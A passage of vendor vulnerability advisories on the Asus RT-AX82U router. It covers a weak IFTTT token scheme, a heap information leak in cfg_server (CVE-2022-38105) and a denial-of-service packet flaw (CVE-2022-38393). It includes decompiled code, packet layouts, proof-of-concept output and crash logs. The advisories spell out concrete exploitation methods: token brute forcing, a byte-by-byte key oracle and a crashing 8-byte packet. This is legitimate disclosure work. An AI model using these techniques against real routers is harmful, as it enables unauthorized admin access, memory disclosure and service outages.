0007b7a0              Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] user_agent not from IFTTT/ALEXA\n", "gen_IFTTTtoken", 0x405, token, outbuf, arg3, 0xf1430)
0007b7a4          r0_8 = 3
0007b668      else
0007b668          int32_t r2
0007b668          uint8_t* r3
0007b668          r2, r3 = nvram_set("skill_act_code", p2_nvram_get(item: "skill_act_code_t"))
0007b674          generate_asus_token(dst: &ifttt_token_copy, len: 0x20, r2, readsrc: r3)     // [7]
0007b684          strlcpy(dst: outbuf, src: &ifttt_token_copy, len: 0x20)
0007b694          nvram_set("ifttt_token", &ifttt_token_copy)
0007b698          nvram_commit()
0007b6ac          if (isFileExist("/tmp/IFTTT_ALEXA") s> 0)
0007b6d0              Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] get IFTTT long token success\n", "gen_IFTTTtoken", 0x408, token, outbuf, arg3, 0xf1430)
0007b6d4          r0_8 = 0
0007b7ac      return r0_8

Right at the beginning there is a check [5] to see if the uptime of the device is more than two minutes after the 

ifttt_stoken
 has been generated. Assuming we are within that timeframe, the 
ifttt_stoken
 nvram item is grabbed and compared with our 
shortToken
 at [6]. If there’s a match, we end up hitting the code branch around [7], where the device generates a new 
ifttt_token
 and copies it to the output buffer on the next line of code. As a reminder, this token grants the same admin access as the normal HTTP login token.

While nothing really seems out of place at the moment, let’s take a look over at the code which actually generates the 

ifttt_stoken
:

00074210  uint8_t* do_ifttt_token_generation(uint8_t* output)
// [...]
000742c0      char ifttt_token[0x80]
000742c0      memset(&ifttt_token, 0, 0x80)
000742d0      char timestamp[0x80]
000742d0      memset(&timestamp, 0, 0x80)
000742e0      char rbinstr[0x8]
000742e0      rbinstr[0].d = 0
000742e8      int32_t* randbinstrptr = &rbinstr
000742f4      rbinstr[4].d = 0
00074308      srand(x: time(timer: nullptr))
0007431c      // takes the remainder...
00074324      int_to_binstr(inp: __aeabi_idivmod(rand(), 0xff), cpydst: randbinstrptr, len: 7)              // [8]
// [...]
00074608      snprintf(s: &ifttt_token, maxlen: 0x80, format: &percent_o, binary_str_to_int(randbinstrptr)) // [9]
0007461c      nvram_set("ifttt_stoken", &ifttt_token)
00074638      snprintf(s: &timestamp, maxlen: 0x80, format: &percentld, uptime())                           // [10]
00074648      nvram_set("ifttt_timestamp", &timestamp)
00074658      strlcpy(dst: output, src: &skill_act_code, len: 0x48)
0007465c      nvram_commit()
0007466c      return output

With the unimportant code cut out, we are left with a somewhat clear view of the generation process. At [8] a random number is generated that is then moded against 0xFF. This number is then transformed into a binary string of length 8 (e.g. ‘00101011’). A lot further down at [9], this 

randbinstrptr
 is converted back to an integer and fed into a call to 
snprintf(&amp;ifttt_token, 0x80, "%o", ...)
, which generates the octal version of our original number. With this in mind, we can clearly see that the keyspace for the 
ifttt_stoken
 is only 255 possibilities, which makes brute forcing the 
ifttt_stoken
 a trivial matter. While normally this would not be a problem, since the 
ifttt_stoken
 can only be used for two minutes after generation, we can see a flaw in this scheme if we take a look at the 
ifttt_timestamp
’s creation. At [10] we can clearly see that it is the 
uptime()
 of the device in seconds (which is taken from 
sysinfo()
). If we recall the actual check from before:

0007b5d4      int32_t r0 = uptime()
// [...]
0007b614      if (r0 - nvram_get_int("ifttt_timestamp") s> 120)
// [...]
0007b630      else if (nvram_get_and_cmp("ifttt_stoken", token) == 0)

We can see that the current uptime is used against the uptime of the generated token. Unfortunately for the device, 

uptime
 starts from when the device was booted, so if the device ever restarts or reboots for any reason, the 
ifttt_stoken
 suddenly becomes valid again since the current uptime will most likely be less than the 
uptime()
 call at the point of 
ifttt_stoken
 generation. Neither the 
ifttt_timestamp
 or the 
ifttt_stoken
 are ever cleared from nvram, even if the Amazon Alexa and IFTTT setting are disabled, and so the device will remain vulnerable from the moment of first generation of the configuration.

Asus RT-AX82U cfg_server cm_processREQ_NC information disclosure vulnerability

CVE-2022-38105

SUMMARY

An information disclosure vulnerability exists in the cm_processREQ_NC opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router’s configuration service. A specially-crafted network packets can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Asus RT-AX82U 3.0.0.4.386_49674-ge182230

PRODUCT URLS

RT-AX82U — https://www.asus.com/us/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AX82U/

DETAILS

The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via a HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IOT style.

The 

cfg_server
 and 
cfg_client
 binaries living on the Asus RT-AX82U are both used for easy configuration of a mesh network setup, which can be done with multiple Asus routers via their GUI. Interestingly though, the 
cfg_server
 binary is bound to TCP and UDP port 7788 by default, exposing some basic functionality. The TCP port and UDP ports have different opcodes, but for our sake, we’re only dealing with the TCP opcodes which look like such:

type_dict = {
   0x1    :   "cm_processREQ_KU",   // [1]
   0x3    :   "cm_processREQ_NC",   // [2]
   0x4    :   "cm_processRSP_NC",
   0x5    :   "cm_processREP_OK",
   0x8    :   "cm_processREQ_CHK",
   0xa    :   "cm_processACK_CHK",
   0xf    :   "cm_processREQ_JOIN",
   0x12   :   "cm_processREQ_RPT",
   0x14   :   "cm_processREQ_GKEY",
   0x17   :   "cm_processREQ_GREKEY",
   0x19   :   "cm_processREQ_WEVENT",
   0x1b   :   "cm_processREQ_STALIST",
   0x1d   :   "cm_processREQ_FWSTAT",
   0x22   :   "cm_processREQ_COST",
   0x24   :   "cm_processREQ_CLIENTLIST",
   0x26   :   "cm_processREQ_ONBOARDING",
   0x28   :   "cm_processREQ_GROUPID",
   0x2a   :   "cm_processACK_GROUPID",
   0x2b   :   "cm_processREQ_SREKEY",
   0x2d   :   "cm_processREQ_TOPOLOGY",
   0x2f   :   "cm_processREQ_RADARDET",
   0x31   :   "cm_processREQ_RELIST",
   0x33   :   "cm_processREQ_APLIST",
   0x37   :   "cm_processREQ_CHANGED_CONFIG",
   0x3b   :   "cm_processREQ_LEVEL",
}  

Out of the 24 different opcodes, only 3 or so can be used without authentication, and so let’s start from the top with 

cm_processREQ_KU
 [1]. The simplest request, it demonstrates the basic TLV structure of the 
cfg_server
:

struct REQ_TLV = {
    uint32_t tlv_type;
    uint32_t size;
    uint32_t crc;
    char buffer[];
}

For the 

cm_processREQ_KU
 request, 
type
 is 1 and the 
crc
 doesn’t actually matter, but the 
size
 field will always be the size of the 
buffer
 field, not the rest of the headers. Regardless, this particular request gets responded to with the server’s public RSA key. This RSA key is needed in order to send a valid 
cm_processREQ_NC
[2] packet, which is where our bug is. The 
cm_processREQ_NC
 request is a bit complex, but the structure is given below:

struct REQ_NC = {
    uint32_t tlv_type = "\x00\x00\00\x03",
    uint32_t size,
    uint32_t crc,
    uint32_t tlv_subpkt1 = "\x00\x00\x00\x01", //[3]
    uint32_t sizeof_subpkt1,
    uint32_t crcof_subpkt1,
    char master_key[ ],                        //[4]
    uint32_t tlv_subpkt2 = "\x00\x00\x00\x03",
    uint32_t sizeof_subpkt2,   
    uint32_t crcof_subpkt2,
    char client_nonce[ ],                      //[5]
}

The 

cm_processREQ_KU
 request provides the server with two different items that are used to generate the session key needed for all subsequent requests, the 
master_key
[3] and the 
client_nonce
[4]. A quick note before we get to that: Everything in the packet starting from the 
tlv_subpkt1
 field at [3] gets encrypted by the RSA public key that we get from the 
cm_processREQ_KU
 request, so there’s an implicit length limitation due to RSA encryption. Continuing on, the 
master_key
[4] buffer is used as the  
aes_ebc_256
 key that the server will use to encrypt the response to this packet, and the 
client_nonce
 buffer is used to generate a session key later on. Let us now examine what the server sends in return:

[~.~]> x/60bx $r1
0xb62014e0:     0x00    0x00    0x00    0x02    0x00    0x00    0x00    0x20 // headers
0xb62014e8:     0x06    0x42    0x18    0x4f    
   
0xb62014ec:     0x13    0x9f    0x09    0x97 // server nonce [6]
0xb62014f0:     0x90    0x92    0x9b    0x85    0xe5    0x40    0xa1    0x38
0xb62014f8:     0xd7    0x81    0x62    0x72    0xf6    0x88    0x5c    0xef
0xb6201500:     0x61    0x86    0x5c    0xc0    0xef    0xc0    0x06    0x23
0xb6201508:     0xa2    0x6d    0x6a    0x85    
                                 
0xb620150c:     0x00    0x00    0x00    0x03                     // headers
0xb6201510:     0x00    0x00    0x00    0x04    0x51    0xb3    0x28    0x43
0xb6201518:     0xcc    0xcc    0xcc    0xcc // [...]            // client nonce [7]

Both the 

server_nonce
 at [6] and the 
client_nonce
[7] are AES encrypted and sent back to us. Subsequent authentication consists of generating a session key from 
sha256(groupid + server_nonce + client_nonce)
. In order to hit our bug, we don’t even need to go that far. Let us take a quick look at how the AES encryption happens:

0001d8b0    void *aes_encrypt(char *enckey, char *inpbuf, int32_t inpsize, uint32_t outsize){
0001d8c8         int32_t ctx = EVP_CIPHER_CTX_new();
0001d8d4         if (ctx == 0){ ... }
0001d904         else {
0001d914              int32_t r0_2 = EVP_EncryptInit_ex(ctx: ctx, type: EVP_aes_256_ecb(), imple: null, key: enckey, iv: nullptr);

We don’t need to delve too much into what occurs; it suffices to know that the key is passed directly from the 

enckey
 parameter straight into the 
EVP_EncryptInit_ex
. Backing up to find what exactly is passed:

00057534 int32_t cm_processREQ_NC(int32_t clifd, struct ctrlblk *ctrl, void *tlvtype, int32_t pktlen, void *tlv_checksum, struct tlv_ret_struct* sess_block, char *pktbuf, uint32_t client_ip, char *cli_mac){
{...}
00058b58    void *aes_resp = aes_encrypt(enckey: sess_block->master_key, inpbuf: nonce_buff, inpsize: clinonce_len + sess_block->server_nonce_len + 0x18, outsize: &act_resp_b_size);

We can see it involves the masterkey that we provided. Let’s back up further in 

cm_processREQ_NC
 to see exactly how it’s populated:

00057534 int32_t cm_processREQ_NC(int32_t clifd, struct ctrlblk *ctrl, void *tlvtype, int32_t pktlen, void *tlv_checksum, struct tlv_ret_struct* sess_block, char *pktbuf, uint32_t client_ip, char *cli_mac){
// [...]
00057af4              int32_t req_type = decbuf_0x1002.request_type_le
00057af4              int32_t req_len = decbuf_0x1002.total_len_le
00057af4              int32_t req_crc = decbuf_0x1002.crc_mb
00057b00              int32_t reqlen = req_len u>> 0x18 | (req_len u>> 0x10 & 0xff) << 8 | (req_len u>> 8 & 0xff) << 0x10 | (req_len & 0xff) << 0x18
00057b08              int32_t reqcrcle_
00057b08              if (reqlen != 0)
00057b10                  reqcrcle_ = req_crc u>> 0x18 | (req_crc u>> 0x10 & 0xff) << 8 | (req_crc u>> 8 & 0xff) << 0x10 | (req_crc & 0xff) << 0x18
00057b18                  if (reqcrcle_ != 0)
00057bb4                      if (req_type != 0x1000000)  // master key [8]
                                    // [...]
00057c48                      int32_t decsize_m0xc = size_of_decrypted - 0xc
00057c50                      if (decsize_m0xc u< reqlen)  // [9]
                                    // [...]
00057cf0                      char (* var_1048_1)[0x1000] = &dec_buf_contents
00057d00                      if (do_crc32(IV: 0, buf: &dec_buf_contents, bufsize: reqlen) != reqcrcle_) [10]
                                    // [...]
00057d94                      sess_block->masterkey_size = reqlen
00057d9c                      char* aeskey_malloc = malloc(bytes: reqlen) // [11]
00057da8                      sess_block->master_key = aeskey_malloc
                                    // [...]
00057db8                      memset(aeskey_malloc, 0x0, reqlen);  
00057dd8                      memcpy(aeskey_malloc, &dec_buf_contents, reqlen); 

Trimming out all the error cases, we start from where the server starts reading the bytes decrypted with its RSA private key. All the fields have their endianess reversed, and the sub-request type is checked at [8]. A size check at [9] prevents us from doing anything silly with the length field in our master_key message, and a CRC check occurs at [10]. Finally the 

sess_block-&gt;master_key
 allocation occurs at [11] with a size that is provided by our packet.

Now, an important fact about AES encryption is that the key is always a fixed size, and for AES_256, our key needs to be 0x20 bytes. As noted above however, there’s not actually any explicit length check to make sure the provided 

master_key
 is 0x20 bytes. Thus, if we provide a 
master_key
 that’s say, 0x4 bytes, a 
malloc
memset
 and 
memcpy
 of size 0x4 will occur.  
aes_encrypt
 will read 0x20 bytes from the start of our 
master_key
’s heap allocation, resulting in an out-of-bound read and assorted heap data being included into the AES key that encrypts the response. While not exactly a straight-forward leak, we can figure out these bytes if we slowly oracle them out. Since we know what the last bytes of the response should be (the 
client_nonce
 that we provide), we can simply give a 
master_key
that’s 0x1F bytes, and then brute force the last byte locally, trying to decrypt the response with each of the 0xFF possibilities until we get one that correctly decrypts. Since we know the last byte, we can then move onto the second-to-last byte, and so-on and so forth, until we get useful data.

While the malloc that occurs can go into a different bucket based on the size of our provided 

master_key
, heuristically it seems that the same heap chunk is returned with a 
master_key
 of less than 0x1E bytes. A different chunk is returned if the key is 0x1F or 0x1E bytes long. If we thus give a key of 0x1D bytes, we have to brute-force 3 bytes at once, which takes a little longer but is still doable. After that we can go byte-by-byte again and leak important information such as thread stack addresses.

Crash Information

$python infoleak.py

Type: 1 (cm_processREQ_KU)
Len:  0x4
CRC:  0x56b642cd
===MSG===
\x11\x22\x33\x44
=========

b'\x00\x00\x00\x01\x00\x00\x00\x04V\xb6B\xcd\x11"3D'
[^_^] Importing:
-----BEGIN PUBLIC KEY-----
[...]
-----END PUBLIC KEY-----

Type: 3 (cm_processREQ_NC)
Len:  0x100
CRC:  0x92657321
===MSG===
\x1a\x54\xd7\x4a\xf6\x7a\xe1\x4c\x16\x76\x69\x74\x2b\x96\x41\xc6\xa0\xbc\x57\x58\x45\x61\xa9\xa9\x04\x09\xae\xb4\xb2\x9c\x54\xdd\xb8\xd1\x8f\x0d\x25\xf6\x79\x07\xd6\x65\x12\x75\xbb\x7d\x2d\x4e\x41\xf0\xa9\x47\x75\xa5\x73\x2d\x4c\x02\x10\x9e\xb1\x3a\x2c\xa5\x1c\x11\xfe\x35\x8e\xd3\x95\x53\xe5\x90\x3a\x9a\x8b\xad\x9b\x10\x81\xde\xd3\x67\x19\x9d\x34\x44\x52\x75\x1d\x90\xc7\xbf\x19\xf1\x04\x15\x19\xd4\x11\x2d\x70\xbd\xa9\x87\xdf\x22\x59\xc2\xb0\xb1\xd5\x7b\x5a\xcb\xe7\xc7\x34\x0f\xcb\xa6\x9f\x81\x5c\xb3\x6d\xf7\x1c\x49\xd7\xed\x72\x54\x85\xe0\xca\x32\x96\xa9\xa2\x44\xda\x56\xfb\xf7\x96\x21\x53\xb7\xbe\x9c\xc9\x5f\x4a\x00\xdb\x2f\xd2\x6e\x1b\xf5\xdc\xa9\xa5\x8f\xde\xf5\x80\x83\xd7\xd8\x65\xe8\x6f\xd6\x0a\x3e\x10\x92\xca\xd2\xbf\x14\x1c\x06\xf0\x53\xb5\x41\xea\x2a\xe2\x5c\x2a\xa8\xb9\xa2\x92\xe7\xd5\x44\x55\x1c\x8e\x9b\xff\x13\x37\x60\x5b\x82\xfa\xa0\xe7\x44\x8f\x0b\xe9\x8f\x64\xcd\xa4\x50\xe9\xcd\xbc\x14\x34\xed\x57\xc5\x0a\xaf\xc3\x8d\x71\xee\x48\x35\x90\xa6\xb7\x08\x6c\xfb\xb1\xbf\xee\x0c\x72\x21\xdf\x4e\x29\xf9
=========

[^_^] Leaked Bytes: 0x0000b620
b'\x00\x00\x00\x02\x00\x00\x00 \x1a=\xac\x11\xebVxU\xe7\\\xdb8\x02\\k\n<\x91_>\x17\xc6r\x08\xfc\xbc\xde\xf6\x1a\x1ev\xfa\x03_\xf0y\x00\x00\x00\x03\x00\x00\x00\x07\x10\xc1\x06\xa9\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x01'

Asus RT-AX82U cfg_server cm_processConnDiagPktList denial of service vulnerability

CVE-2022-38393

SUMMARY

A denial of service vulnerability exists in the cfg_server cm_processConnDiagPktList opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router’s configuration service. A specially-crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Asus RT-AX82U 3.0.0.4.386_49674-ge182230

PRODUCT URLS

RT-AX82U — https://www.asus.com/us/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AX82U/

DETAILS

The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via a HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IOT style.

The 

cfg_server
 and 
cfg_client
 binaries living on the Asus RT-AX82U are both used for easy configuration of a mesh network setup, which can be done with multiple Asus routers via their GUI. Interestingly though, the 
cfg_server
 binary is bound to TCP and UDP port 7788 by default, exposing some basic functionality. The TCP port and UDP ports have different opcodes, but for our sake, we’re only dealing with a particular set of ConnDiag opcodes which look like such:

struct tlv_holder connDiagPacketHandlers = 
{
    uint32_t type = 0x5
    tlv_func *tfunc = cm_processREQ_CHKSTA
}
struct tlv_holder connDiagPacketHandlers[1] = 
{
    uint32_t type = 0x6
   tlv_func *tfunc = cm_processRSP_CHKSTA
}

The above TLVs are accessible from the 

cm_recvUDPHandler
 thread in a particular codeflow:

0001ed90      cm_recvUdpHandler()
              // [...]
0001edf8      int32_t bytes_read = recvfrom(sfd: cm_ctrlBlock.udp_sock, buf: &readbuf, len: 0x7ff, flags: 0, srcaddr: &sockadd, addrlen: &sockaddsize) // [1]
                // [...]
0001ee00      if (bytes_read == 0xffffffff)
                // [...]
0001ee98      else if (sockadd.sa_data[2].d != cm_ctrlBlock.self_address)
                // [...]
0001f0e0          char* malloc_824 = malloc(bytes: 0x824) // [2]
0001f0e4          struct udp_resp* inp = malloc_824
0001f0e8          if (malloc_824 != 0)
0001f184              memset(malloc_824, 0, 0x824)        // [3]
0001f194              memcpy(inp, &readbuf, bytes_read)
0001f198              int32_t ipaddr = sockadd.sa_data[2].d
0001f19c              inp->bytes_read = bytes_read
0001f1a4              int32_t ip = ipaddr u>> 0x18 | (ipaddr u>> 0x10 & 0xff) << 8 | (ipaddr u>> 8 & 0xff) << 0x10 | (ipaddr & 0xff) << 0x18
0001f1d4              snprintf(s: &inp->ip_addr_str, maxlen: 0x20, format: "%d.%d.%d.%d", ip u>> 0x18, ip u>> 0x10 & 0xff, ip u>> 8 & 0xff, ror.d(ip, 0) & 0xff, var_864, var_860, var_85c, var_858, var_854)
0001f1dc              int32_t var_838_1 = readbuf[4].d
0001f1dc              int32_t var_834_1 = readbuf[8].d
0001f1e8              if (readbuf[0].d == 0x6000000)      // [4]
0001f1f0                  r0_6 = cm_addConnDiagPktToList(inp: inp)

At [1], the server reads in 0x7ff bytes from its UDP 7788 port, and at [2] and [3], the data is then copied from the stack over to a cleared-out heap allocation of size 0x824. Assuming the first four bytes of the input packet are “\x00\x00\x00\x06”, then the packet gets added to a particular linked list structure, the 

connDiagUdpList
. Before we continue on though, it’s appropriate to list out the structure of the input packet:

struct tlv_pkt {
    uint32_t type;
    uint32_t datalen;
    uint32_t crc;
    uint8_t data[];
}

Continuing on, another thread is constantly polling the 

connDiagUdpList
, and if a packet is seen, then we jump over to 
cm_processConnDiagPktList()
:

00053ca8  int32_t cm_processConnDiagPktList()    
00053cc8      pthread_mutex_lock(mutex: &connDiagLock)
00053cd8      struct list* connDiagUdp = connDiagUdpList
00053ce8      if (connDiagUdp->entry_count s> 0)
00053d2c          for (struct listitem* item = connDiagUdp->tail; item != 0; item = item->next)
00053d30              struct udp_resp* input_pkt = item->inp
00053d38              if (input_pkt != 0)
00053d44                  uint32_t null = terminateConnDiagPktList
00053d4c                  if (null != 0)
00053d4c                      break
00053d50                  uint32_t hex_6000000 = input_pkt->req_type_le
00053d58                  uint32_t dlen = input_pkt->datalen_le
00053d68                  int32_t dlenle = input_pkt->bytes_read - 0xc  // [5]
00053d6c                  uint32_t crcle = input_pkt->crcle
                            // [...]
00053d80                  if (dlenle == (dlen u>> 0x18 | (dlen u>> 0x10 & 0xff) << 8 | (dlen u>> 8 & 0xff) << 0x10 | (dlen & 0xff) << 0x18)) //[6]
00053e0c                      char* buf = &input_pkt->readbuf
00053e18                      crc = do_crc32(IV: null, buf: buf, bufsize: dlenle) // [7]

At [5], the actual length of the input packet minus twelve is compared against the length field inside the packet itself [6]. Assuming they match, the CRC is then checked, another field provided in the packet itself. A flaw is present in this function, however, in that there is a check missing in this code path that can be seen in both the TCP and UDP handlers: the code needs to verify that the size of the received packet is >= 0xC bytes. Thus, if a packet is received that is less than 0xC bytes, the 

dlenle
 field at [5] underflows to somewhere between 
0xFFFFFFFC
 and 
0xFFFFFFFF
. The check against the length field [6] can be easily bypassed by just correctly putting the underflowed length inside the packet. The CRC check at [7] isn’t an issue, since if the 
bufsize
 parameter is less than zero, it automatically skips CRC calculation. Since a CRC skip results in a return value of 0x0, we need to make sure that the 
crc
 field is “\x00\x00\x00\x00”. Conveniently, this is handled already for us if our packet is only 8 bytes long, since the buffer that the packet lives in was 
memset
 to 0x0 beforehand.

While we can pass all the above checks with an 8-byte packet, it does prevent us from having any control over what occurs after. We end up hitting 

cm_processConnDiagPkt(uint32_t tlv_type, uint32_t datalen, uint32_t crc, char *databuf, char *ipaddr)
 which just passes us off to the appropriate TLV handler. Since our opcode has to be “\x00\x00\x00\x06”, we always hit 
cm_processRSP_CHKSTA(char *pktbuf, uint32_t pktlen, uint32_t ipaddr)
:

00052f20  int32_t cm_processRSP_CHKSTA(char* pktbuf, uint32_t pktlen, int32_t ipaddr)
00052f50      char jsonbuf[0x800]
00052f50      memset(&jsonbuf, 0, 0x800)
                             // [...]
00052f64      if (cm_ctrlBlock.group_key_ready != 0)
00053004          char* groupkey = cm_selectGroupKey(which_key: 1)
0005300c          if (groupkey == 0)
                                              // [...]
00053098              goto label_530a0
000530c0          char* r0_11 = do_decrypt(sesskey1: groupkey, sesskey2: cm_selectGroupKey(which_key: 0), pktbuf: pktbuf, pktlen: pktlen) //[8]

Assuming there is a group key (which there should always be, even if the AImesh setting is not configured), then we end up hitting the 

do_decrypt
 function at [8], which decrypts the data of our input packet with one of the groupkeys. The 
do_decrypt
 function ends up hitting 
aes_decrypt
 as shown below:

0001db18  void* aes_decrypt(char* sesskey1, char* pktbuf, char* pktlen, int32_t* outlen)
0001db30      int32_t ctx = EVP_CIPHER_CTX_new()
0001db38      int32_t outl = 0
0001db3c      void* ctx = ctx
0001db40      void* ret
0001db40      if (ctx == 0)
                                    // [...]
0001db6c      else
0001db6c          char* bytesleft = nullptr
0001db7c          int32_t r0_2 = EVP_DecryptInit_ex(ctx, EVP_aes_256_ecb(), 0, sesskey1, 0)
                                     // [...]
0001db84          if (r0_2 != 0)
0001dba0              *outlen = 0
0001dbac              void* alloc_size = EVP_CIPHER_CTX_block_size(ctx) + pktlen
0001dbb4              maloced = malloc(bytes: alloc_size)  // 0xc...
0001dbbc              if (maloced == 0)
                                                     //[...]
0001dbe4              else
0001dbe4                  memset(maloced, 0, alloc_size)
0001dbec                  void* mbuf = maloced
0001dbf0                  char* pktiter = pktlen
0001dc00                  void* inpbuf
0001dc00                  void* r3_2
0001dc00                  while (true)
0001dc00                      inpbuf = &pktbuf[pktlen - pktiter]
0001dc04                      if (pktiter u<= 0x10)
0001dc04                          break
0001dc10                      bytesleft = 0x10
0001dc1c                      int32_t r0_8 = EVP_DecryptUpdate(ctx, mbuf, &outl, inpbuf, 0x10) //[9]
0001dc20                      r3_2 = r0_8
0001dc24                      if (r0_8 == 0)
0001dc24                          break
0001dc60                      int32_t outl_len = outl
0001dc64                      pktiter = pktiter - 0x10
0001dc6c                      mbuf = mbuf + outl_len
0001dc74                      *outlen = *outlen + outl_len

For brevity’s sake, we can skip all the way to [9], where 

EVP_DecryptUpdate
 is called repeatedly in a loop over the input buffer. Since the 
pktlen
 argument has been underflowed to atleast 0xFFFFFFFC, it suffices to say that we have a wild read, resulting in a crash when reading unmapped memory.

Crash Information

potentially unexpected fatal signal 11.
CPU: 1 PID: 12452 Comm: cfg_server Tainted: P           O    4.1.52 #2
Hardware name: Generic DT based system
task: d04cd800 ti: d0632000 task.ti: d0632000
PC is at 0xb6c7f460
LR is at 0xb6d3ca04
pc : [<b6c7f460>]    lr : [<b6d3ca04>]    psr: 60070010
sp : b677c46c  ip : 00ff4ff4  fp : b6600670
r10: b6c7ef40  r9 : 00000000  r8 : beec0b82
r7 : b6600670  r6 : 00000010  r5 : b6620c38  r4 : 00ff5004
r3 : b6c7f440  r2 : 00000000  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 1048c04a  DAC: 00000015
CPU: 1 PID: 12452 Comm: cfg_server Tainted: P           O    4.1.52 #2
Hardware name: Generic DT based system
[<c0026fe0>] (unwind_backtrace) from [<c0022c38>] (show_stack+0x10/0x14)
[<c0022c38>] (show_stack) from [<c047f89c>] (dump_stack+0x8c/0xa0)
[<c047f89c>] (dump_stack) from [<c003ac30>] (get_signal+0x490/0x558)
[<c003ac30>] (get_signal) from [<c00221d0>] (do_signal+0xc8/0x3ac)
[<c00221d0>] (do_signal) from [<c0022658>] (do_work_pending+0x94/0xa4)
[<c0022658>] (do_work_pending) from [<c001f4cc>] (work_pending+0xc/0x20)